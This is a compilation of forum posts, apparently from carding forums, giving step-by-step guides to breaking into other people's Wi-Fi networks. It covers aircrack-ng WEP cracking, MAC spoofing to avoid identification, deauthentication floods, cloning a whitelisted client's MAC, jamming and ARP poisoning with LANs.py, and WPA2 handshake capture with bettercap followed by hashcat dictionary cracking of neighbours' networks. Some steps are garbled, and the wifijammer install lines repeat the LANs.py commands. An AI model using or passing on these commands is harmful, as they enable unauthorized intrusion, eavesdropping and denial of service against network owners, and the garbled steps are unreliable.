HOW TO HACK ALL TYPE OF WI-FI

[Carder]

Step 1:

First Download Backtrack

Step 2:

Burn the iso image on CD and boot your laptop from CD drive

Step 3:

Select the third boot option(VESA/KDE).

Step 4:

Once in BT3, click the tiny black box in the lower left corner to load up a “Konsole” window.

Step 5:

Type the following command
airmon-ng
Note down the interface name. In this example wifi0

Step 6:

airmon-ng stop wifi0

Step 7:

ifconfig wifi0 down

Step 8:

macchanger –mac 00:11:22:33:44:66 wifi0

Step 9:

airmon-ng start wifi0

Step 10:

airodump-ng wifi0
This will start populating Wifi networks. Press Ctrl + C to stop.
Check the network with WEP encryption.
Notedown BSSID, CH and ESSID somewhere in notepad or paper
Note that if the same BSSID is available in the second part with STATION associated with it,
means you some one is accessing that network and our task will be little easier.
If not than don’t worry we will still crack it.

Step 11:

airodump-ng -c (channel) -w (file name)
Replace
(channel) with the CH which u had already n
(file name) with any name of your choice
(bssid) with the BSSID which u had already note
–bssid (bssid) wifi0
Note it
Leave this console as it is and start new konsole

Step 12:

aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:66 wifi0
If you don’t get Association Successful message then keep on trying until you got success.

Step 13:

aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:66 wifi0
Well if you don’t see ARP ACK and sent packets are not increasing
or still 0 than it means no 1 is accessing that network.
But don’t worry you go an optional step,
Leave this console as it is and start new k

Step 14:

aireplay-ng -2 –p 0841 –c FF:FF:FF:FF:FF:FF
konsole
message than keep on trying until you get success got an optional step
konsole
–b (bssid) –h 00:11:22:33:44:66 wfi0
Press y and enter
Now you will see that ARP and ACK packets in 2nd console are increasing fast
Keep this console as it is and start 4th console.

Step 15:

aircrack-ng -b (bssid) (filename)-
Just wait and watch…..Backtrack will do rest of the work.
Hurray we got the key.

Done!

Download BackTrack

BackTrack Linux - Penetration Testing Distribution

BackTrack Linux was 2006-2013. Now reborn as Kali Linux

www.backtrack-linux.org

 

[Carding 4 Carders]

? HOW TO INSTALL BACKTRACK AND HACK WI-FI ON ANDROID ?

ʀᴇϙᴜɪʀᴇᴍᴇɴᴛs

1. ʀᴏᴏᴛᴇᴅ ᴀɴᴅʀᴏɪᴅ ᴅᴇᴠɪᴄᴇ ʀᴏᴏᴛ ʏᴏᴜʀ ᴀɴᴅʀᴏɪᴅ
2. ᴅᴏᴡɴʟᴏᴀᴅ ʙᴀᴄᴋᴛʀᴀᴄᴋ ᴀʀᴍ
3. ᴅᴏᴡɴʟᴏᴀᴅ ʙᴜsʏʙᴏx
4. ᴅᴏᴡɴʟᴏᴀᴅ ᴀɴᴅʀᴏɪᴅ ᴠɴᴄ
5. ᴅᴏᴡɴʟᴏᴀᴅ ᴀɴᴅʀᴏɪᴅ ᴛᴇʀᴍɪɴᴀʟ
6. ɪғ ʏᴏᴜ ᴀʀᴇ ᴜsɪɴɢ ᴘᴄ ᴛʜᴇɴ ʏᴏᴜ ɴᴇᴇᴅ 7ᴢɪᴘ ғᴏʀ ᴇxᴛʀᴀᴄᴛɪᴏɴ ᴏᴛʜᴇʀᴡɪsᴇ ʏᴏᴜ ᴄᴀɴ ᴜsᴇ ᴅᴏᴡɴʟᴏᴀᴅ ᴢᴀʀᴀᴄʜɪᴇᴠᴇʀ ᴏɴ ʏᴏᴜʀ ᴀɴᴅʀᴏɪᴅ ᴘʜᴏɴᴇ.

sᴛᴇᴘs ᴛᴏ ɪɴsᴛᴀʟʟ ʙᴀᴄᴋᴛʀᴀᴄᴋ & ʜᴀᴄᴋ ᴡɪғɪ ᴏɴ ᴀɴᴅʀᴏɪᴅ

?ғɪʀsᴛ, ᴇxᴛʀᴀᴄᴛ ᴛʜᴇ ʙᴛ5-ɢɴᴏᴍᴇ-ᴀʀᴍ.7ᴢ. ᴀɴᴅ ᴄᴏᴘʏ ʙᴛ5 ғᴏʟᴅᴇʀ ᴀɴᴅ ᴛʜᴇɴ ᴘᴜᴛ ɪɴ ʏᴏᴜʀ ᴀɴᴅʀᴏɪᴅ ʀᴏᴏᴛ ᴅɪʀᴇᴄᴛᴏʀʏ. ғᴏʀ ᴇxᴀᴍᴘʟᴇ- ᴍʏ ᴘʜᴏɴᴇs ʀᴏᴏᴛ ᴅɪʀᴇᴄᴛᴏʀʏ ɪs /sᴅ ᴄᴀʀᴅ. (ᴀs ᴅɪғғᴇʀᴇɴᴛ ᴀɴᴅʀᴏɪᴅs ᴡɪʟʟ ʜᴀᴠᴇ ᴅɪғғᴇʀᴇɴᴛ ʀᴏᴏᴛ ᴅɪʀᴇᴄᴛᴏʀɪᴇs).
ɪɴsᴛᴀʟʟ ᴀʟʟ ᴀᴘᴘs ᴛʜᴀᴛ ɢɪᴠᴇɴ ɪɴ ʀᴇϙᴜɪʀᴇᴍᴇɴᴛs.

ᴀғᴛᴇʀ ɪɴsᴛᴀʟʟɪɴɢ ʙᴜsʏʙᴏx ᴀᴘᴘʟɪᴄᴀᴛɪᴏɴ ᴏᴘᴇɴ ɪᴛ ᴀɴᴅ ᴡᴀɪᴛ ᴜɴᴛɪʟ ɪᴛ ғɪɴɪsʜᴇs ʟᴏᴀᴅɪɴɢ ᴀɴᴅ ᴛʜᴇɴ ᴄʟɪᴄᴋ ᴏɴ sᴍᴀʀᴛ ɪɴsᴛᴀʟʟ ʙᴜᴛᴛᴏɴ ᴏғ ᴛʜᴇ ᴀᴘᴘʟɪᴄᴀᴛɪᴏɴ.

ɪɴ ʏᴏᴜʀ, ᴀɴᴅʀᴏɪᴅ ᴏᴘᴇɴ ᴛʜᴇ ᴛᴇʀᴍɪɴᴀʟ ᴀᴘᴘ ᴀɴᴅ ᴛʜᴇɴ ᴇxᴇᴄᴜᴛᴇ ᴛʜᴇ ɢɪᴠᴇɴ ᴄᴏᴍᴍᴀɴᴅs.
sᴜ
ᴄᴅ /sᴅᴄᴀʀᴅ/ʙᴛ5sʜ ʙᴏᴏᴛʙᴛ
ᴡʜᴇɴ sᴜ ᴄᴏᴍᴍᴀɴᴅs ᴇxᴇᴄᴜᴛᴇᴅ ɪᴛ ᴡɪʟʟ ᴀsᴋ ғᴏʀ sᴜᴘᴇʀ ᴜsᴇʀ ᴀᴄᴄᴇss ʏᴏᴜ ʜᴀᴠᴇ ᴛᴏ ᴄʟɪᴄᴋ ᴏɴ ɢʀᴀɴᴛ ᴏɴ ᴛʜᴇ ᴘʀᴏᴍᴘᴛ ᴀᴘᴘᴇᴀʀ.
ɴᴏᴡ ᴀғᴛᴇʀ ᴛʜɪs ᴛʏᴘᴇ ᴛʜᴇ ᴄᴏᴍᴍᴀɴᴅs: ᴇxᴘᴏʀᴛ ᴜsᴇʀ=ʀᴏᴏᴛ ᴜɴᴘᴀssᴇᴅ

ɴᴏᴡ ʏᴏᴜ ᴡɪʟʟ ʙᴇ ᴀsᴋᴇᴅ ᴛᴏ ᴇɴᴛᴇʀ ᴛʜᴇ ᴘᴀssᴡᴏʀᴅ, ᴇɴᴛᴇʀ ʏᴏᴜʀ ᴄʜᴏɪᴄᴇ ᴀɴᴅ ᴘʀᴇss ᴇɴᴛᴇʀ.
ɴᴏᴡ ᴛʏᴘᴇ ᴛʜᴇ ʙᴇʟᴏᴡ ᴄᴏᴍᴍᴀɴᴅ:
ᴛɪɢʜᴛᴠɴᴄ sᴇʀᴠᴇʀ -ɢᴇᴏᴍᴇᴛʀʏ 1280×720

ᴛʜᴇ ᴛᴇʀᴍɪɴᴀʟ ᴇᴍᴜʟᴀᴛᴏʀ ᴡɪʟʟ ᴄʀᴇᴀᴛᴇ ᴛʜᴇ ʟᴏᴄᴀʟʜᴏsᴛ ᴛᴏ ᴄᴏɴɴᴇᴄᴛ ɪᴛ ᴛᴏ ᴠɴᴄ sᴇʀᴠᴇʀ. : ɴᴏᴡ ɴᴏᴛᴇ ᴛʜᴇ ʟᴏᴄᴀʟʜᴏsᴛ ᴘᴏʀᴛ ᴍᴀʀᴋᴇᴅ ʀᴇᴅ ʙᴇʟᴏᴡ. ɴᴏᴡ ᴍɪɴɪᴍɪᴢᴇ ᴛʜᴇ ᴛᴇʀᴍɪɴᴀʟ ᴇᴍᴜʟᴀᴛᴏʀ.

ᴏᴘᴇɴ ᴛʜᴇ ᴀɴᴅʀᴏɪᴅ ᴠɴᴄ ᴀɴᴅ ᴛʏᴘᴇ ᴛʜᴇ ғᴏʟʟᴏᴡɪɴɢ sᴇᴛᴛɪɴɢs ɢɪᴠᴇɴ:
ɴɪᴄᴋɴᴀᴍᴇ: ʙᴛ5
ᴘᴀssᴡᴏʀᴅ: sᴀᴍᴇ ᴘᴀssᴡᴏʀᴅ ᴀs ᴇɴᴛᴇʀᴇᴅ ɪɴ ᴛᴇʀᴍɪɴᴀʟ
ᴀᴅᴅʀᴇss: ʟᴏᴄᴀʟʜᴏsᴛ
ᴘᴏʀᴛ: 5906

 

[Carding Forum]

HOW TO ACCESS A WIRELESS NETWORK?​

You will need a wireless network enabled device such as a laptop, tablet, smart phones etc. You will also need to be within the transmission radius of a wireless network access point. Most devices (if the wireless network option is turned on) will provide you with a list of available networks. If the network is not password protected, then you just have to click on connect. If it is password protected, then you will need the password to gain access.

Wireless Network Authentication

Since the network is easily accessible to everyone with a wireless network enabled device, most networks are password protected. Let’s look at some of the most commonly used authentication techniques.

WEP

WEP is the acronym for Wired Equivalent Privacy. It was developed for IEEE 802.11 WLAN standards. Its goal was to provide the privacy equivalent to that provided by wired networks. WEP works by encrypting the data been transmitted over the network to keep it safe from eavesdropping.

WEP Authentication

Open System Authentication (OSA). This methods grants access to station authentication requested based on the configured access policy.

Shared Key Authentication (SKA). This method sends to an encrypted challenge to the station requesting access. The station encrypts the challenge with its key then responds. If the encrypted challenge matches the AP value, then access is granted.

WEP Weakness

WEP has significant design flaws and vulnerabilities.

• The integrity of the packets is checked using Cyclic Redundancy Check (CRC32).CRC32 integrity check can be compromised by capturing at least two packets. The bits in the encrypted stream and the checksum can be modified by the attacker so that the packet is accepted by the authentication system. This leads to unauthorized access to the network.
• WEP uses RC4 encryption algorithm to create stream ciphers.The stream cipher input is made up of an initial value (IV) and a secret key. The length of theinitial value (IV) is 24 bits long while the secret key can either be 40 bits or 104 bits long. The total length of both the initial value and secret can either be 64 bits or 128 bits long.The lower possible value of the secret key makes it easy to crack it.
• Weak Initial values combinations do not encrypt sufficiently. This makes them vulnerable to attacks.
• WEP is based on passwords; this makes it vulnerable to dictionary attacks.
• Keys management is poorly implemented. Changing keys especially on large networks is challenging. WEP does not provide a centralized key management system.
• The Initial values can be reused

Because of these security flaws, WEP has been deprecated in favor of WPA

WPA

WPA is the acronym for Wi-Fi Protected Access. It is a security protocol developed by the Wi-Fi Alliance in response to the weaknesses found in WEP. It is used to encrypt data on 802.11 WLANs. It uses higher Initial Values 48 bits instead of the 24 bits that WEP uses. It uses temporal keys to encrypt packets.

WPA Weaknesses

• The collision avoidance implementation can be broken
• It is vulnerable to denial of service attacks
• Pre-shares keys use passphrases. Weak passphrases are vulnerable to dictionary attacks.

How to Crack Wireless Networks

WEP cracking

Cracking is the process of exploiting security weaknesses in wireless networks and gaining unauthorized access. WEP cracking refers to exploits on networks that use WEP to implement security controls. There are basically two types of cracks namely;

• Passive cracking– this type of cracking has no effect on the network traffic until the WEP security has been cracked. It is difficult to detect.
• Active cracking– this type of attack has an increased load effect on the network traffic. It is easy to detect compared to passive cracking. It is more effective compared to passive cracking.

WEP Cracking Tools

• Aircrack– network sniffer and WEP cracker. Can be downloaded from http://www.aircrack-ng.org/
• WEPCrack– this is an open source program for breaking 802.11 WEP secret keys. It is an implementation of the FMS attack. http://wepcrack.sourceforge.net/
• Kismet- this can detector wireless networks both visible and hidden, sniffer packets and detect intrusions. http://www.kismetwireless.net/
• WebDecrypt– this tool uses active dictionary attacks to crack the WEP keys. It has its own key generator and implements packet filters. http://wepdecrypt.sourceforge.net/

WPA Cracking

WPA uses a 256 pre-shared key or passphrase for authentications. Short passphrases are vulnerable to dictionary attacks and other attacks that can be used to crack passwords. The following tools can be used to crack WPA keys.

• CowPatty– this tool is used to crack pre-shared keys (PSK) using brute force attack. http://wirelessdefence.org/Contents/coWPAttyMain.htm
• Cain & Abel– this tool can be used to decode capture files from other sniffing programs such as wireshark. The capture files may contain WEP or WPA-PSK encoded frames. http://www.oxid.it/cain.html

General Attack types

• Sniffing– this involves intercepting packets as they are transmitted over a network. The captured data can then be decoded using tools such as Cain & Abel.
• Man in the Middle (MITM) Attack– this involves eavesdropping on a network and capturing sensitive information.
• Denial of Service Attack– the main intent of this attack is to deny legitimate users network resources. FataJack can be used to perform this type of attack. More on this in article

Cracking Wireless network WEP/WPA keys

It is possible to crack the WEP/WPA keys used to gain access to a wireless network. Doing so requires software and hardware resources, and patience. The success of such attacks can also depend on how active and inactive the users of the target network are.

We will provide you with basic information that can help you get started. kali is a Linux based security operating system. It is developed on top of Ubuntu. kali comes with a number of security tools. kali can be used to gather information, assess vulnerabilities and perform exploits among other things.

Some of the popular tools that kali has includes;

• Metasploit
• Wireshark
• Aircrack-ng
• NMap
• Ophcrack

Cracking wireless network keys requires patience and resources mentioned above. At a minimum, you will need the following tools

A wireless network adapter with the capability to inject packets (Hardware)

• Kali Operating System. You can download it from here http://www.kali.org/downloads/ (Software)
• Be within the target network’s radius. If the users of the target network are actively using and connecting to it, then your chances of cracking it will be significantly improved.
• Sufficient knowledge of Linux based operating systems and working knowledge of Aircrack and its various scripts.
• Patience, cracking the keys may take a bit of sometime depending on a number of factors some of which may be beyond your control. Factors beyond your control include users of the target network using it actively as you sniff data packets.

 

[Carding]

4 best tricks for hacking WIFI networks​

A lot has been written about hacking WIFI. But this is such a vast and interesting topic that there is always something new to say about it. After all, hacking WIFI is the beginning of almost all hackers))) So today, we have collected for you 4 best methods of hacking WIFI networks. These methods will help you work more efficiently in your pentests!

1. Change and automatic generation of a new MAC address upon a new connection to Wi-Fi
MAC (Media Access Control) is a unique identifier issued to each unit of active equipment (that is, a network adapter, router, switch, and so on) or some of their interfaces.

The MAC is stitched into the hardware at the time of manufacture and is used on the network to identify the sender and recipient of a frame. It is assumed that when a new device appears on the network, the administrator does not have to manually set the MAC for it.

Scheme of the structure of a six-octet MAC address.

The MAC is unique (or at least should be) for each network interface. At the same time, a device may have several of them - for example, laptops have at least two of them: one for the controller for a wired Ethernet connection, the second for the Wi-Fi adapter. For a router or a switch, the addresses are unique for each port, and if it is a Wi-Fi router, then the addresses for each wireless interface will differ (for modern routers, these are 2.4 GHz and 5 GHz).

Why Change MAC?
MAC allows you to uniquely identify the device and does not change when you change the operating system - it is flashed into a microcircuit that provides a network interface.

Penetration testers and hackers hide their MAC to prevent identification of the equipment during an attack. I think you understand why this might be needed: if you use a real MAC, then it can be flashed when connected to other networks. There are also tools for mapping MAC with geographic coordinates - for example, the iSniff-GPS script from the Kali suite.

Practice
So, let's say you are using Linux. Let's see how to change MAC without using additional programs.

Open a terminal and enter the command

$ ifconfig | grep HWaddr

If you are using Ethernet, then you can see the addresses of the adapters like this:

$ ifconfig | grep ether

To temporarily change your MAC, you need to turn off the corresponding network interface. For example, for interface eth1, the command would be:

$ ifconfig eth1 down

Now you can create a new MAC.

$ ifconfig eth1 hw ether 00: 00: 00: 00: 00: 11

As you can imagine, you can substitute any numbers into this template.

Now eth1 needs to be brought up again

$ ifconfig eth1 up

And the last thing - you need to check if the changes have taken effect. If you look at the MAC list again, you will see that the interface has changed. However, after restarting the computer, the old MAC value will return.

It would be convenient if the MAC changes every time you connect to the network. The NetworkManager package will help us with this . Since version 1.4, this program supports MAC spoofing, and it has many useful options.

For each group, "wired" (ethernet) and "wireless" (wifi) MAC rules are configured separately.

Also remember that a wireless adapter can be in one of two states:

• scan - set using the property wifi.scan-rand-mac-address. By default yes, that is, during scanning, an arbitrary MAC address will be set. If you choose no, this will not happen;
• connected to the network - set by the property wifi.cloned-mac-address, by default its value is preserve.

For the wired interface (property ethernet.cloned-mac-address) and the wireless interface in the connected state (wifi.cloned-mac-address), the following options are available:

• explicitly specified MAC - that is, you can set your own permanent MAC;
• permanent - use the MAC address embedded in the device (by default);
• preserve - do not change the MAC of the device after activation (for example, if the MAC was changed by another program, then the current address will be used);
• random - generate a random value for each connection.

NetworkManager is configured via a file /etc/NetworkManager/NetworkManager.conf. Alternatively, you can add an additional file with the .conf extension to the directory /etc/NetworkManager/conf.d(the config can be called whatever you like). I recommend the second method, because when you update NetworkManager usually replaces the main .conf, and if you make changes to it, they will be lost.

Turn on automatic generation of random MAC addresses
If you want the MAC address to be changed every time you connect, but the same MAC was used when connecting to the same network, then you need to add a couple of lines to the config. Here they are:

[connection]
ethernet.cloned-mac-address = stable
wifi.cloned-mac-address = stable

Properties ethernet.cloned-mac-addressand wifi.cloned-mac-addresscan be set individually or together.

You can check the values by typing ip a, and for the changes to take effect, you need to restart NetworkManager:

$ sudo systemctl restart NetworkManager

Now connect to the wireless network and check the MAC values again.

The same addresses will be generated for the same networks. If you want the addresses to be always different, the settings will be as follows:

[connection]
ethernet.cloned-mac-address = random
wifi.cloned-mac-address = random

Install a specific MAC
Let's say we need to use a specific MAC. To do this, we will reign again /etc/NetworkManager/conf.d/mac.conf.

To set the MAC for the wired interface, add the following lines:

[connection]
ethernet.cloned-mac-address = <new MAC>

To set the MAC for a wireless connection - these are:

[connection]
wifi.cloned-mac-address = <new MAC>

Instead <NEW MAC>, of course, you should write the desired MAC address. And of course, you can configure the settings for wired and wireless connections at the same time.

Please note that using this method, the MAC will only change after you connect to the network. Before that, the interfaces will have their source addresses. An exception might be Wi-Fi if you've already configured spoofing as shown above. To cancel spoofing, add the following lines to the config:

[device]
wifi.scan-rand-mac-address = no

More ways to programmatically change MAC
Not only NetworkManager can change MAC. In fact, there are many ways to do this using both third-party programs and system services. To keep track of the results, change the NetworkManager settings:

[device]
wifi.scan-rand-mac-address = no

Now it will not spoof MAC while scanning wireless networks.

Since the NetworkManager is not configured with ethernet.cloned-mac-addressand wifi.cloned-mac-address, the default value ( preserve) will be used , even if the MAC has been changed by other programs.

I will continue to run the examples in Kali Linux and change the settings for the Wi-Fi adapter. The peculiarity of all these methods is that the changes will be lost after a system reboot or after reconnecting the adapter.

Changing MAC with iproute2
We will use the ip program which is included in the iproute2 package. Let's start by checking the current MAC:

$ ip link show

At the exit, after the words, link/etheryou will see the MAC address. First of all, turn off the corresponding interface. I have this wlan0.

$ sudo ip link set dev wlan0 down

Next, we go directly to MAC spoofing. You can set any value, but remember that the network can be configured so that addresses are not issued if the MAC does not match the device of some well-known manufacturer. Therefore, it is better to take a known prefix as the first three bytes and change only the second three bytes.

To change the MAC, execute the command

$ sudo ip link set dev <interface> address <MAC>

Substitute your values.

The final step is to return the interface to the up state:

$ sudo ip link set dev <interface> up

Well, to check the changes, you can write

$ ip link show <interface>

The value link/ethershould be the same as you set.

Change MAC with macchanger
Another option is to use the macchanger program. Here it is possible to create a MAC like the equipment of a certain manufacturer, and completely randomize it. Kali has this utility by default.

At the time of changing the MAC, as with other methods, the device should not be used, so turn it off:

$ sudo ip link set dev <interface> down

Further, I will have wlan0 as an interface, change it to your own if necessary.

To find out the MAC values, you can run the utility with the option -s:

$ sudo macchanger -s wlan0

As a result, it will give out the current MAC and the one that is stitched in the device (in case they do not match), and also indicate the vendor. For instance:

Current MAC: 00: c0: ca: 96: cf: cb (ALFA, INC.)
Permanent MAC: 00: c0: ca: 96: cf: cb (ALFA, INC.)

To change the MAC to a completely arbitrary address, there is an option -r:

$ sudo macchanger -r wlan0

At the output, a new address is added to the two lines above.

To randomize the MAC without changing the first three bytes (manufacturer prefix), there is an option -e:

$ sudo macchanger -e wlan0

Well, if you want to set a new MAC yourself, use -m:

$ sudo macchanger -m <MAC> wlan0

<MAC>Substitute the address you want instead .

Finally, to revert to the original MAC there is an option -p:

$ sudo macchanger -p wlan0

2. Discovery of hidden SSID
Some owners of hotspots configure them so that they do not broadcast their name (ESSID). This is usually done as an additional security measure. Users will not see such a network in the list of available ones, and to connect, they need to type in the name manually.

This is a weak protective measure, because at certain times the ESSID is still broadcasted in clear text.

Getting the hidden SSID with Airodump-ng
You can catch the ESSID on the air during the client's connection, and for this you need to either wait until this happens naturally, or force the process by disconnecting everyone from the access point. This is called deauthentication. Clients that have lost connection will automatically start reconnecting, and the network name will slip through in clear text.

The first step is to run airodump:

$ airodump-ng <interface>

When it fires up a new network, you will see the BSSID, name length, and channel used. For example, if the network operates on the first channel, we indicate it:

$ airodump-ng wlan0 --channel 1

In the same way as when intercepting a handshake, you can specify a key -wfollowed by a file name prefix. Capturing the handshake does not interfere with identifying the hidden point. Then you can either just wait for someone to connect, or deauthenticate all clients:

$ aireplay-ng -0 3 -a <BSSID> wlan0

Here -0means bulk deauthentication, 3 is the number of packets sent.

The result will come almost instantly, and you will see a line with the full name of the hidden access point.

3. Bypassing MAC filtering by borrowing an address from the whitelist
Airodump-ng will again help us with this task. We put the adapter into monitoring mode and execute the following commands:

$ ifconfig wlan0 down && iwconfig wlan0 mode monitor && ifconfig wlan0 up $ airodump-ng wlan0

You will see a list of networks, the number of connected clients and their MAC addresses that can be assigned to your adapter, if the network is configured with white list filtering.

It also happens that clients are not immediately visible at certain access points, since the program has not collected enough information. In this case, again, deauthentication will help you. If the hotspot has at least one client, you will see it immediately after reconnecting. And at the same time, you can intercept handshakes.

To deauthenticate, stop Airodump-ng and start it again, only with the indication of the channel of the point of interest to us.

$ airodump-ng wlan0 --channel 1

After that, send deauth packages and see what happens:

$ aireplay-ng -0 5 -a <MAC> wlan0

After the attack is complete, some of the previously unknown clients will be exposed. Copy the MAC of one of the legitimate users, write it down in the settings of your network card - and you can carry out a deliberate attack.

4. Jamming the Wi-Fi network
During a penetration test, it is sometimes necessary to drown out some of the access points. For this, I recommend using the LANs utility. She knows how not only to jam Wi-Fi, but also other things: it spies on users, individually poisoning the ARP tables of the target machine, router and, if necessary, DNS server.

The jamming range strongly depends on the power of the adapter, but the script has settings that allow you to jam everyone or just one client. Everything is simple here: download and install dependencies and download the script itself.

$ sudo apt install -y python-nfqueue python-scapy python-twisted nbtscan
$ git clone https://github.com/DanMcInerney/LANs.py.git
$ cd LANs.py/

Now you can run our script to start jamming.

$ python lans.py -u -p

Keys -uand -pmean active detection of the target for ARP spoofing and output of all interesting unencrypted data that they send or request. -ipThere is no option here, so an ARP scan of the network will be performed and its results will be compared with the results of the live "promiscuous" capture. The result will be a list of all clients on the network.

Press Ctrl + C to stop searching when you build a network map and look at the lists of connected clients. For the same purposes, by the way, you can use Nmap successfully.

The spot jamming option will look like this:

$ python lans.py --jam --accesspoint <Router MAC> -s <MAC to pass>

Here:

• Jam — jam all or some 2.4GHz wireless hotspots and clients within range; if necessary, additional arguments can be used along with this (below);
• s - this is how you can set a MAC that will not be deauthorized;
• Accesspoint - here you can enter the MAC of a specific access point that will act as a target.

Jamming all Wi-Fi networks will look like this:

$ python lans.py --jam

Jamming only one access point:

$ python lans.py --jam --accesspoint <BSSID>

Here, too, you can set some additional options:

• ch - limit jamming to one channel;
• Directedonly - do not send deauthentication packets to broadcast addresses of access points, but only to pairs from the client and hotspot;
• Accesspoint - this is how you can specify a specific access point as a target.

Another effective script for jamming Wi-Fi
It can be convenient to use the wifijammer utility to jam Wi-Fi. It is extremely easy to use, so there is almost nothing to discuss here: without parameters, it will simply drown out everything that it finds in the range of the adapter. In order not to hurt your own, you can exclude some MAC addresses with the option -s.

Install wifijammer:

$ sudo apt install -y python-nfqueue python-scapy python-twisted nbtscan
$ git clone https://github.com/DanMcInerney/LANs.py.git
$ cd LANs.py/

And run:

[sudo python2 wifijammer.py -s <MAC for exception>

That's all! I hope you found something new and interesting among the features I showed you and it will be useful to you in your work.

 

[Teacher]

In my past the biggest question ever was »HOW TO HACK WIFI«, well we have many methods to do. There are scepticals »"Bruteforcing takes too long"«, stfu, you never tried. Of course if you are using 10k passwordlist, then you haven't success, but if you use simple github wordlists then we can rock this shit. I tried also and it worked on a WPA2 network.

⛏ ????????????

➤ WiFi USB Adapter:

• Atheros AR9271:

https://www.amazon.com/Alfa-Network-AWUS036NHA-u-Mount-cs-WLAN-Netzwerkadapter/dp/B01D064VMS/ref=mp_s_a_1_1?keywords=atheros+ar9271&qid=1557710229&s=computers&sr=1-1

• Ralink RT3070:

Amazon.com

• Ralink RT3572:

https://www.amazon.com/Dualband-Wireless-WiFi-LAN-Adapter-Ralink-Dongle-TV-Stick/dp/B07PVL25W5/ref=mp_s_a_1_fkmrnull_7?keywords=Ralink+RT3572&qid=1557710524&s=gateway&sr=8-7-fkmrnull

• Realtek RTL8812AU:

https://www.amazon.de/EU-World-RTL8812AU-Netzwerk-Windows10/dp/B07QC12V85/ref=mp_s_a_1_1_sspa?keywords=Realtek+RTL8812AU&qid=1557710640&s=gateway&sr=8-1-spons&psc=1

• Ralink RT5370N:

Amazon.de

➤ Laptop / Computer With Any Linux (Aircrack Utilities Already Installed »apt-get install aircrack-ng«)

➤ USB Male , Female Cable (https://www.amazon.com/Monoprice-15...ture_eight_browse-bin:15562491011&s=pc&sr=1-5)

➤ Time For Wordlist Creation

Sorry for the very long links.

Create Wordlists For Attack

$ git clone https://github.com/kennyn510/wpa2-wordlists; cd wordlists
$ mkdir /root/wordlists

(creating wordlists folder for later)

There are many subdirectories, i am showing you how to make one wordlist with "Bigone2016":

$ gunzip *.gz
$ cat *.txt >> bigone.txt
$ awk '!(count[$0]++)' bigone.txt > bigone2.txt
$ egrep -v "^[[:space:]]*$" bigone2.txt > wordlist1.txt
$ mv -v wordlist1.txt /root/wordlists/

After this, we have unziped, echoed all in one txt file, removed duplicates and finally removed all blank lines. Our endresult would wordlist1.txt.

Do this for all subdirectories, after you have this we can headover to next step, we need to compile all text documents in one.

In directory "/root/wordlists" i saved all compiled wordlists, now we need to compile all wordlists into one. Be careful, the wordlists creation takes time!

$ cd /root/wordlists
$ cat *.txt >> full.txt
$ awk '!(count[$0]++)' full.txt > cleaned.txt
$ egrep -v "^[[:space:]]*$" cleaned.txt > final.txt

Now let's see our lines:

$ wc -l final.txt
207329081 full.txt

(i didn't cleaned)

Scanning For Targets

We have successfully created wordlists. Now we need to setup our computer / laptop for the scanning.
When scanning, it is important to use the USB.

$ ifconfig

My interface is for example wlan0

$ airmon-ng check kill

$ airmon-ng start wlan0

After monitor mode is enabled, we are using bettercap tool.

$ bettercap --iface wlan0mon

$ help wifi

In bettercap we are ready to go.

TIP: Use the usb men female cable for long cable and open your window and hold out your WiFi Dongle USB. Now wait a while, I live in a good neighborhood I got after about 10 minutes about 50 networks, at least it is worth waiting here. Best is to hold the USB somehow at the open window.

$ wifi.recon on

After networks has been detected, write after every minute:

$ wifi.show

To view all available networks. For example, I didn't have to do anything, not even deauth, to get my PMKID handshakes for Aircrack, but you can do that with the deauth.

Getting Handshake

$ wifi.deauth all

$ wifi.assoc all

Repeat commands after 1-2 minutes every time.

$ wifi.show

$ exit

Cracking Handshakes

The Handshakes has been saved in "/root/bettercap-handshakes......". The PCAP file

We can take the PCAP file for manual, slow password cracking from Aircrack, or convert it to a handshake from Hashcat, and crack it much faster with Hashcat. (requires a very powerful computer, of course).
(i don't know exactly name of bettercap handshake i call it now bettercap-handshake.pcap).

$ mv -v bettercap-handshake.pcap wordlists/

$ cd wordlists

Aircrack Method:

$ aircrack-ng  -w <wordlist> <handshake>

$ aircrack-ng -w final.txt bettercap-handshake.pcap

Aircrack takes time to crack.

Hashcat Method:

Go to this website:

hashcat cap2hccapx - advanced password recovery

CAP-to-HCCAPX online converter page for WPA/WPA2

hashcat.net

Select your file of handshake and convert it.
Move it in your wordlists folder and then we can begin:

$ hashcat -m 2500 -a 0 <handshake.hccapx> <wordlist> --force


$ hashcat -m 2500 -a 0 32465-3456.hccapx wordlist.txt --force

Press S for Status. If hashcat has a match with one of these hashes, we will be notified.